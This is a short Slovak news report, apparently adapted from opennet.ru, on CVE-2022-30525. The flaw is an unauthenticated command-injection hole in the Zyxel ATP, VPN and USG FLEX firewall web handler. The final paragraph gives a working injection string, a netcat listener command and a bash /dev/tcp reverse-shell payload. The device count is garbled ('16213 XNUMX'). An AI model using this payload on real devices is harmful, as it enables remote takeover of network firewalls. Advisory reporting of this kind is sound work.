V zariadeniach Zyxel série ATP, VPN a USG FLEX bola identifikovaná kritická zraniteľnosť (CVE-2022-30525), ktorá je navrhnutá tak, aby organizovala prevádzku firewallov, IDS a VPN v podnikoch, čo umožňuje externému útočníkovi spustiť kód na zariadenie bez používateľských práv bez autentifikácie. Na vykonanie útoku musí byť útočník schopný odosielať požiadavky do zariadenia pomocou protokolu HTTP/HTTPS. Zyxel opravil chybu zabezpečenia v aktualizácii firmvéru ZLD 5.30. Podľa služby Shodan je momentálne v globálnej sieti 16213 XNUMX potenciálne zraniteľných zariadení, ktoré prijímajú požiadavky cez HTTP/HTTPS.
Operácia sa vykonáva odoslaním špeciálne navrhnutých príkazov do webového obslužného programu /ztp/cgi-bin/handler, ktorý je prístupný bez autentifikácie. Problém je spôsobený nedostatočným vyčistením parametrov požiadavky pri vykonávaní príkazov v systéme pomocou volania os.system použitého v knižnici lib_wan_settings.py a vykonávaného pri spracovaní operácie setWanPortSt.
Útočník by napríklad mohol prejsť reťazcom „; ping 192.168.1.210;" čo povedie k vykonaniu príkazu „ping 192.168.1.210“ v systéme. Ak chcete získať prístup k príkazovému shellu, môžete na svojom systéme spustiť „nc -lvnp 1270“ a potom spustiť spätné pripojenie odoslaním požiadavky do zariadenia s '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Zdroj: opennet.ru